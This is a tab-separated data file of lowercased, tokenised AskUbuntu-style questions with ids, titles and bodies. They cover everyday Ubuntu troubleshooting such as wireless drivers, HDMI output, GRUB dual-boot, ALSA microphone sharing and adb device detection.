352979	how do i go from linux mint 15 to ubuntu ?	i have linux mint 15 and want to uninstall that and use ubuntu , i am real new to the whole linux os . please help me out if you can !
352981	low quality screencast with kazam and recordmydesktop ?	i created my first screencast recently using kazam screencaster and edited it in kdenlive . but the quality of video is low , pixelated . i tried recordmydesktop , it is buggy and does n't show a few parts of video . now , i do n't know how to create a high quality or standard quality screencasts . one more thing i would like to know is what frame rate ( fps ) do you set while recording screen .
352982	no hdmi on pc monitor to speakers	hi i 'm relatively new to linux and i 'm trying to enable the hdmi sound through my speakers which are connected to my monitor in which that is connected via hdmi to my gtx260 graphics card , the hdmi option isnt appearing in the output devices of the sound settings nor is it showing up in pulse audio volume control
352985	why can not i install the newest software like windows ?	i know there are many dependences . why not keep dependences and software in a pack like in windows ? i mean let software afford its newer dependence with itself . thanks
352986	13.04 , asus zenbook prime ux51vz hdmi output to tv not functioning	i 've downloaded the nvidia drivers and bumblebee , i 'm running xubuntu 13.04 . when i plug the hdmi cord into the side of my laptop , with the tv on hdmi input , nothing happens . when i open up display settings , the tv does n't show up . somehow the hdmi is n't being registered . on my last laptop , it was just plug and go , so i 'm not sure how to approach this . any help would be appreciated ! feel free to ask for more details or commands to put it and post the results , i do n't really know what would be helpful here .
352989	ubuntu documentation details	i was trying to write a report and had few questions about where i could find the specific information about ubuntu such as what is the type of model used ( waterfall or agile ? ) ? what versioning system is used ? ( i know it is subversion , ) , i needed more details what is the testing process and how is it carried out ? what are the quality standards ? what kind of diagrams do they use ( e.g . uml ) i tried searching them , but could n't find a concrete page , can someone provide me with appropriate links or any help . i would really be thankful
352990	webcam issue dell latitude e6400 , lubuntu 13.04	i bought a used dell e6400 and installed lubuntu 13.04 on it . unable to detect webcam on it . please advise how can i ensure whether the webcam is functional or not and how to detect the webcam . appreciate any help .
352993	swapped an xubuntu hard drive into a macbook . works fine aside from no wireless ?	( backstory , may or may not be helpful ) so i 'm trying to get at least one of my laptops to work correctly . my current hard drive was having issues in my cf-29 toughbook , i believe due to heat issues . the cf-29 has no fan , and instead just uses a small heat sink which sits right by the cd tray . due to how much a new hard drive caddy costs , i instead went with a cd hard drive caddy . end backstory this worked alright for a while , but the i started having random hard drive freezes , and it became so prevalent that i decided to try popping the hard drive into my macbook . the macbook started up fine , and is smoking fast compared to the toughbook , but it does n't recognize my wireless card . do i need to do a full back up , and re-install xubuntu in the macbook ? or can i just download the driver for the wireless card someplace ? by the way , i am not experienced at all with linux . i 've used xubuntu for a little while , but i 've only opened up terminal a handful of times , and just followed what someone else said to do , to the letter . i do n't actually understand how terminal works , or what sudo is , or syslinux vs isolinux , or any of that stuff . on my next winter break i 'm hoping on reading a linux for dummies book .
352994	mail on an error	i would like to be notified by email whenever my web-application does an error . in this link , someone says that `` guys , just pipe ~/.pm2/logs/*.err to your favourite mailer , all data are there. '' . i did n't understand what exactly i should do - what does it mean to `` pipe the files to the mailer '' ? what should i do in order to get an email when there is a new line in the error log ?
352996	how to install libmysqld-dev on ubuntu 12.04 ?	when i enter the command : sudo apt-get install libmysqld-dev i get this message : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libmysqld-dev : depends : libmysqlclient-dev ( > = 5.5.32-0ubuntu0.12.04.1 ) e : unable to correct problems , you have held broken packages . how do i solve this problem ?
352997	time displayed on vpn connection	i use firefox to connect to my work 's vpn site . ( some sort of java connection ) i log in to a server that is physically located about 5 miles from where i am . for some reason , either ubuntu or windows doesnt seem to know what time it is , or it doesnt know how to tell what timezone is set on the computer making the connection . i have to manually change the timezone on the machine i am connecting to in order to get the right time to display for everything . i know that is kinda vague , but someone has had to have seen something similar ... the pc is ubuntu . the server is a windows server . the wrong time is the system time that the server displays . i do n't know what you mean by `` please show the output of date and date -- utc on the ubuntu machine . ''
353001	windows 8 not detected in the grub menu	i installed ubuntu 13.04 on my laptop which has windows 8 pre-installed . i restarted the laptop and it doesnt give any entry for windows 8 n the grub menu . i tried it by disabling secure boot as well . still no luck . then i used boot repair with recommended settings but it still doesnt provide me with any option for windows 8 after restarting . the boot repair info listed : http : //paste.ubuntu.com/6186725/ would you please have a look and let me know what exactly is the problem ? thank you .
353003	how to go from activities overview to libre office directly -- bypassing documents ?	i am running ubuntu-gnome 13.04 . when i search in activities overview and if i click on a matching document , it takes me to documents . from there , i can click on open in the gear menu and open the document in the native program . while this is ok with 'read-only ' documents like pdf files , it is an unnecessary intermediate step for 'mostly edit ' documents like libre office docs . is there anyway i can skip this intermediate step of documents ?
353006	passing int variable to re.findall	i 'm trying pass year variable to re.findall , but it does n't work ( no errors ) . can anyone specify where i 'm going wrong ? year=2013 links = re.findall ( r '' ( '+year+'-.*\/t . *.html ) '' , line )
353007	can not connect to wireless after reboot	yesterday i installed the compat driver to get my realtek wireless card working . everyting was fine until i rebooted my laptop this morning . and no wireless connections show up in network manager . lshw -c network looks good *-network description : wireless interface product : rtl8723ae pcie wireless network adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 00 serial : 48 : d2:24:28:70:4d width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8723ae driverversion=3.2.0-54-generic firmware=n/a latency=0 multicast=yes wireless=ieee 802.11bgn resources : irq:18 ioport : d000 ( size=256 ) memory : f7900000-f7903fff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:04:00.2 logical name : eth0 version : 0a serial : 00:90 : f5 : ea : e4:59 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8168 driverversion=8.037.00-napi duplex=half latency=0 multicast=yes port=twisted pair speed=100mbit/s resources : irq:42 ioport : c000 ( size=256 ) memory : f2104000-f2104fff memory : f2100000-f2103fff iwconfig is fine as well wlan0 ieee 802.11bgn essid : off/any mode : ad-hoc frequency:2.412 ghz cell : 76 : f6:73 : eb:45:1e tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off i would n't have posted here if google-ing had solved my problem . things i have tried service network-manager restart ifconfig wlan0 up /ect/init.d/networking restart gedit /etc/networkmanager/networkmanager.conf and set managed=false to true gedit /etc/network/interfaces and everything looks good ( i did n't change it , just checked that wlan0 is not listed there ) rmmod rtl8723ae modprobe rtl8723ae but nothing works . i guess something was turned on during driver installation , but the system failed to turn it on again during booting . can anyone help me ? or else i have to live in a world without internet connection ( maybe better , huh ? ) . some log message $ dmesg | grep -i rtl [ 18.775375 ] rtl8723ae 0000:03:00.0 : pci int a - > gsi 18 ( level , low ) - > irq 18 [ 18.775384 ] rtl8723ae 0000:03:00.0 : setting latency timer to 64 [ 18.790268 ] rtl8723ae : using firmware rtlwifi/rtl8723fw_b.bin [ 19.079022 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 19.079268 ] rtlwifi : wireless switch is on iwlist scan says that no wireless connection is found . nmcli dev and nmcli dev wifi list give similar results ( the device is ok , but no connections found ) . edit : this is the first time i post on askubuntu , and i feel really glad to receive help from chili555 and ramchandra apte . but let me finish my story first . i reboot my system to windows 8 to make sure that the wireless card is ok. after that , i switch to ubuntu , and run iwlist scan , and feel really surprised to see tons of output coming from the terminal . now everything works out of the box again ! i remembered that when i was trying to suspend my laptop the night i installed the compat driver for the first time , it took longer than usual , so i long-pressed the power button . since then , the laptop would fail to recover if i closed its lid to suspend it . and the wireless stopped working the morning after that . so the real problem may have little to do with the wireless driver . i guess an internal switch in the hardware was toggled during halting , so the card ceased to scan for connections . however , the windows driver is clever ( or lucky ) enough to re-enable the card , and things work out . i can not reproduce the problem now so some of the logs are incomplete . however , the problem is fixed anyway . and i witnessed a sharp increase in my productivity during the nights when my laptop could not connect to wifi . thank you for your time . really appreciate your help .
353008	hf and vhf interoperability in gnu radio platform	please help me out in creating flowgraph of receiver and transmitter waveform in gnu radio . i have got ubuntu 13.04 and gnu version 3.6.4.1 . usrp1 with both hf and vhf daughter card . i have to create interoperability between hf and vhf in this sdr platform . i have created a flowgraph in which vhf transreceiver is working only during daytime . and for the hf part , it 's not done . if possible , i am thinking of integrating both the flowgraphs in one , withou use of lan . somebody , having any knowledge in this field , kindly help .
353011	how to install ubuntu 12.04 on a new laptop	i have a new laptop with no os on it and i would like to install ubuntu 12.04 on it . can any one tell me or guide me how to install ubuntu 12.04 .
353016	ubuntu 12.04 boot once every two/three times	i installed ubuntu 12.04 in an asus 8gbram i7 sharing drive with windows 7. tried many options as setnomode , ro , ro quiet , deleting msdos6 and replacing it with6 at set root= ( hd0,6 ) was appearing as set root= ( hd0 , msdos6 ) at booting time and get crazy try many combinations i realized that the problem is that even the same options get sometimes to boot , sometimes to a purple screen and sometimes to a smtp message and gets freezed there . in my bios i have uefi disabled as it was by default in this machine . dmesg for error just this line when im able to boot : ext4-fs ( sda6 ) : re-mounted . opts : errors=remount-ro also im quite suprised as i was expecting the installation to go smooth and suddenly menu.lst is deprecated and my knowledge is old . anyone facing/faced similar behaviour ? found this answer inconsistent booting problem 12.04lts on asus u46e ral7 and solved the problem , just turn of vt-d from the bios
353017	video quality goes bad when add video to kdenlive ?	i have used many screencast programs and every time i add output recording to kdenlive for editing , it shows pixelated video . quality of video becomes very low and i ca n't figure out the reason for that . is there anything related to project settings . my project settings are set to hdv 1440 * 1080i 25fps
353024	wireless ( but no internet ) connection ( ubuntu 13.04 and tp-link router )	i have a tp-link tl-wr702n wireless router ( see http : //www.tp-link.com.de/products/details/ ? model=tl-wr702n ) and an ethernet plug in the wall . if i connect the ( single ) lan/wan port to the ethernet plug , i can access the internet with my smartphone ( which makes me believe this is an ubuntu problem ) , so the wireless connection works . however , i can not access it with my lenovo thinkpad running ubuntu 13.04 ( note : the notebook connects to the wireless network , but can not access the internet ; a wired connection to the ethernet wall plug directly works fine though ) . i experimented quite a bit ( in system settings - > network - > wireless - > tp-link_xxxxxx - > settings ) , but it never worked . as default , the wireless router is in '' ap mode '' which should be fine ( since i could n't access the management website of the router , i reset it , so this should be fine ) . also note that i recently used the wireless router in `` router mode '' ( connected to a cable router ) and i had access both from the smartphone and the notebook . what could be the problem ? if i connect wirelessly to tp-link_xxxxxx ( ipv4 : 'automatic ( dhcp ) ' ) , here is what i see in system settings - > network - > wireless - > tp-link_xxxxxx - > settings : strength excellent link speed 72 mb/s ip address 192.168.0.122 default router 192.168.0.254 dns 192.168.0.254 in case this helps , this is what my smartphone shows : ip address 192.168.0.107 subnet mask 255.255.255.0 router 192.168.0.254 dns 192.168.0.254 search domains glc here is some more information about the connection : ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:134864 errors:0 dropped:0 overruns:0 frame:0 tx packets:134864 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:13397930 ( 13.3 mb ) tx bytes:13397930 ( 13.3 mb ) wlan0 link encap : ethernet hwaddr 84:3a:4b:0b : e9 : d0 inet addr:192.168.0.122 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :863a:4bff : fe0b : e9d0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:113964 errors:0 dropped:1701 overruns:0 frame:0 tx packets:34498 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:23204505 ( 23.2 mb ) tx bytes:6682743 ( 6.6 mb ) cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 search glc nm-tool | grep dns dns : 192.168.0.254 route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.254 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' tp-link_44052e '' mode : managed frequency:2.412 ghz access point : f8:1a:67:44:05:2e bit rate=72.2 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-24 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:32 invalid misc:46 missed beacon:0 cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback sudo lshw -c network [ sudo ] password for ... : *-network description : wireless interface product : centrino advanced-n 6205 [ taylor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 96 serial : 84:3a:4b:0b : e9 : d0 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.8.0-22-generic firmware=18.168.6.1 ip=192.168.0.122 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:45 memory : f0c00000-f0c01fff *-network description : ethernet interface physical id : 2 logical name : eth0 serial : 00 : b5:6d:00:8b:4a size : 10mbit/s capacity : 100mbit/s capabilities : ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=asix driverversion=22-dec-2011 duplex=half firmware=asix ax88772 usb 2.0 ethernet link=no multicast=yes port=mii speed=10mbit/s
353029	how to index tomboy notes with recoll ?	i would like to index the notes from tomboy using the recoll desktop search engine . the notes are in xml , stored in .local/share/tomboy . how to do this ?
353030	before install .deb file appears user gdebi ; but progress install .deb file appears root gdebi	i want install covergloobus and i downloaded .deb file because the ppa method failed . when i click to .deb file appears `` user gdebi '' , but when i click the install button , appears `` root gdebi '' ( i noticed this due my window decorator ) . the install done without problems . but covergloobus no works , and i see when i do system- > preferences- > covergloobus configuration i can change default music plugin to vlc music plugin , but after save , the default music plugin appears again , and covergloobus no works . i think that is due permissions . sorry for my bad english . i have ubuntu minimal 12.04 with kde . thanks for your answers .
353031	ubuntu installation from usb stick	i have a machine which does not have a dvd drive . this machine does not have provision of booting from usb directly . currently the machine is operating on ubuntu 9.04 version . i have downloaded ubuntu version 13.04 from the ubuntu site on to my usb stick . i have also made it a bootable disk as recommended in the ubuntu forums . the size is large and i can not write it onto a cd and i do not have a dvd drive as i have brought out earlier . it 's there any way to install ubuntu from my usb stick given the above conditions ? if yes , can anyone guide me through the process as i am not very constant with the commands . thanks
353032	nautilus - how to apply zoom on the filenames ? not just on the thumbnails	i 'm looking to edit the way for nautilus to handle the zoom . since ubuntu 13.04 , when you use the zoom in nautilus it only changes the thumbnails/icons size , and the filename text stay the same . is there a way to make the zoom function change the size of the filename font ? in image : i tried to look for a hidden option inside dconf-editor ( org.gnome.nautilus . * ) but nothing concur to what i 'm looking for . any tips ! ? notes : i 'm using a desktop version of ubuntu as 'tv ' that i control from my couch , when i was on ubuntu 11.04 i could simply zoom at 200 % and read the filenames easily from the distance , but now , it 's just the icons ... there is also the exemple of my father who have a poor sight , the old zoom function was perfect for him too .
353034	dual-boot windows 7 + ubuntu , should i remove fat32 partition	my partitions are as follows : 900 mb fat32 ( contains .bat , kernel.sys , bootmgr , bootsect.bak , fdosboot.bin ... etc . files ) 70 gb ntfs ( windows 7 ) ( also contains bootmgr , kernel.sys , bootsect.bak after using boot-repair ) 80 gb ext4 ( ubuntu ) 315 gb ntfs ( personal data ) i had dual boot problems after removing ubuntu incorrectly and after using boot-repair i got it solved.the grub menu previously ( before problem ) showed win7 as on /dev/sda1 , which is the fat32 partition.after using boot-repair , it shows two options for win7.one on /dev/sda1 ( goes back to the error i was experiencing ) and another on /dev/sda2 ( actual win7 installation ) which boots me up with win7 . should i consider it safe to just remove the fat32 partition ? i am not using ubuntu much nowadays and again thinking to uninstall it.could you suggest a good way of not messing up the grub and going back to the windows bootloader after removal of ubuntu ? ( winre bootrec commands do not work )
353035	alsa sound - how can i tell microphone source can be used at the same time from two application without showing device is busy ?	i have this /etc/asound.conf file where i can do my audio output to device hw:0 with any applications . but i have two / three/ four applications who need to use same microphone hw:0 with the following i only have one application who can use the mic , but how do i configure , so that if the microphone is busy it still allow other applications to capture it ? like multi microphone access allow . pcm.dmixed { type dmix ipc_key 1024 ipc_key_add_uid 0 slave.pcm `` hw:0 '' } pcm.dsnooped { type dsnoop ipc_key 1025 ipc_key_add_uid 0 slave.pcm `` hw:0 '' } pcm.duplex { type asym playback.pcm `` dmixed '' capture.pcm `` dsnooped '' } # instruct alsa to use pcm.duplex as the default device pcm . ! default { type plug slave.pcm `` duplex '' } ctl . ! default { type plug slave.pcm `` duplex '' }
353036	can i customize ubuntu for my huawei ascent mate as host os	i want to know if i can customize or install ubuntu on my huawei ascend mate having all lastest specifications .
353037	file truncated to 0 bytes during power failure	power went down while editing a file with geany and the file got truncated to 0 bytes ... is it possible to recover the file ?
353038	svn client ( stand alone ) to auto get stuff from our real svn	as a small company we are currently using a ubuntu server as a nas device and want to backup our working svn repository via a svn client . does anyone know a good stand-alone svn client ? i 've read about rabbitvcs but it 's to much in the core . we only need a client which we can apply a time schedule on so it auto fetch files . ps : we are using ubuntu desktop and server in the background .
353041	how to change value of /proc/sys/fs/inotify/max_user_watches	i am working with meteor.js and i need to increase the value of /proc/sys/fs/inotify/max_user_watches to solve my problem ( here is a description of problem and solution ) . but i can not do it : â ~ sudo echo 10000 > /proc/sys/fs/inotify/max_user_watches zsh : permission denied : /proc/sys/fs/inotify/max_user_watches how can i change this value ?
353042	custom partition on window 7 and ubuntu	this question is related to many question but answer was not satisfying , hence posting new one . i have 500gb hdd with 8gb ram along i5 processor in laptop [ battery friendly install ] .i have following partition already . 100 mb : windows partition 300 gb : unpartitioned space 65 gb : windows partition i am ready to erase entire hard disk , but want a prefect scheme . what i want to achieve in my hdd is in order as below : ubuntu my shared ntfs drive for multimedia files windows [ let it be in last , as i am ubuntu friendly ] now problem start when i try to do it in custom partition.please tell me , i am totally open [ can erase window , reinstall all os . ] also all i want a good battery friendly installation [ second major ] my hdd partition dream as ascii -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - | | | | | ubuntu : ) | multimedia+data | windows : ( | | | | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - what i already thought / : 20 gb swap : 10gb /home : 60gb ntfs : rest windows:60gb | | | | |/+swap+home : ) | ntfs | windows : ( | | | | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - please help me to implement this .
353044	grub2 64signed package failed	while installing ubuntu i got that error . i do n't know how to use it . but , i did n't face any error while installing debain . can someone help me to get out of this ?
353047	no wlan0 interface after uninstall ubuntu 13.04	i am using lenovo thinkpad edge 14 0578 well . i made a very stupid mistake such that many important packages are deleted ( cause can not connect to network , weather wire or wireless ) . therefore , i have no choice but to reinstall with the dvd . when reinstalling , i pluged the lan cable and it state it can access to network . however , after reinstall , wire connection is ok but wireless not . with ifconfig wlan0 up wlan0 : error while getting interface flags : no such device and iwconfig eth0 no wireless extensions . lo no wireless extensions . but actually , the chip is exist . with lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 12 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 12 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv710/m92 [ mobility radeon hd 4530/4570/545v ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati rv710/730 hdmi audio [ radeon hd 4000 series ] 03:00.0 network controller : intel corporation centrino wireless-n 1000 [ condor peak ] 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 03 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) axel @ axel-thinkpad-edge : ~ $ lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 12 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 12 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv710/m92 [ mobility radeon hd 4530/4570/545v ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati rv710/730 hdmi audio [ radeon hd 4000 series ] 03:00.0 network controller : intel corporation centrino wireless-n 1000 [ condor peak ] 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 03 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) and lshw -c network *-network unclaimed description : network controller product : centrino wireless-n 1000 [ condor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory : f0300000-f0301fff *-network description : ethernet interface product : rtl8111/8168 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 03 serial : c8:0a : a9:64:85:1f size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168d-2.fw ip=192.168.102.96 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:4000 ( size=256 ) memory : f0204000-f0204fff memory : f0200000-f0203fff memory : f0220000-f023ffff
353048	pendrive capacity decreased after installing ubuntu on it	my usb capacity is 8 gb . it shows 700 mb in disk management . it show 7 gb free space . i am not able to add it .
353049	lsusb lists galaxy samsung tab s2 & adb devices lists nothing	really , i do all my efforts to run an android project through eclipse on a tablet `` samsung galaxy tab s2/ gt-p3100 '' under ubuntu 12.04. i add the vendor id of samsung in ~/.android/adb_usb.ini 0x04e8 i add rules in /etc/udev/rules.d/51-android.rules as following : subsystems== '' usb '' , attrs { idvendor } == '' 04e8 '' , attrs { idproduct } == '' 6860 '' , mode= '' 0666 '' action== '' add '' , subsystem== '' usb '' , env { devtype } == '' usb_device '' , env { id_usb_interfaces } == '' * : ff420 ? : * '' , mode= '' 0666 '' then , i restart udev & i run the following command sudo udevadm control -- reload-rules i updates /etc/udev/rules.d/99-android.rules subsystem== '' usb '' , attrs { idvendor } == '' 04e8 '' , symlink+= '' android_adb '' , mode= '' 0666 '' the thing that perplexed me is the listing of the tab when running the following cmd : abdennour @ estifeda1 : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 125f : a11a a-data technology co. , ltd . bus 002 device 003 : id 413c:2107 dell computer corp . bus 002 device 004 : id 046d : c077 logitech , inc . bus 001 device 009 : id 04e8:6860 samsung electronics co. , ltd gt-i9100 phone [ galaxy s ii ] and the device also is well mounted : i finally recourse a very long solution but , as usual , in vain :
353051	clipboard manager with favorites feature ?	i am looking for a clipboard manager with favorites feature . that is , i should be able to star or mark some clipboard items as favorites . these items should never be removed from the clipboard history . i am using diodon currently and it does not have this feature .
353054	how to prevent users from renaming files while providing write permissions on linux	for some special purpose , i want to prevent non-root users of the linux server from changing or renaming the filenames . however , they can modify and write to the contents of the file . how to do this from command line .
353060	what is the difference between grep apple file and grep `` apple '' file ?	what is the difference between grep apple file and grep `` apple '' file ? what does putting the quotation marks do ? they both appear to work and do the exact same thing ( display same line ) .
353061	ubuntu server to share files using a vpn `` cisco 5505 ''	am wondering if it works ? i want to make a ubuntu server `` file sharing server `` and to use a cisco 5505 as a firewall and vpn to share autocad and documents files the server will be located in a place with the firewall and fix real ip and the clients will be on another place running windows os `` windows 7 `` could be done ? how can i make it ?
353062	rollback to windows 8.1 from ubuntu 13.04	while trying to install ubuntu i accidentally wiped out the hdd and now my windows 8 is gone and i 'm trying to install it back whether alongside with ubuntu or alone . i downloaded the windows 8.1 iso and the win-7 usb dvd tool but of course they 're .exe files so i downloaded `` wine '' but it did n't work and now i 'm stuck with ubuntu and the files mentioned above note : i have an ultrabook so i do n't have cd/dvd drive installed which means i 'm only capable of using usb-stick and there 's noway that this post is duplicated
353066	what can i do to fix broken upgrade to 13.04 ?	my ubuntu 12.10 is'nt working properly . the volume icon in showing -- symbol . and if i click on sound settings in setting it will get stuck there . this problem started after my recent attempt to update to 13.04 failed
353069	compiling gnome-shell in ubuntu 12.04	if i build gnome 3.8 in ubuntu 12.04 from the source will it create any dependency problems ?
353070	regarding ubuntu installation smart phone	i have one smart phone with the following configuration . can i install ubuntu in mobile phone.i want to develop some trial app for ubuntu mobile os . 1 gb ram 8 gb internal memory 1 ghz dual core processor . support upto 32 gb external ram . if yes then how ? ?
353073	mouse and keyboard cloning software	is there a software available that can `` mirror '' keyboard and mouse inputs to multiple windows ? like i have a `` master '' -window in which i click and write and the input from there gets send to several `` slave '' -windows . cheers !
353074	how can do i use server folder via address in browser ?	i have a one server ip address and now we open the folder in browser.i have save a images in server folder /home/download/images/ now how i can open this folder in browser via network . thanks
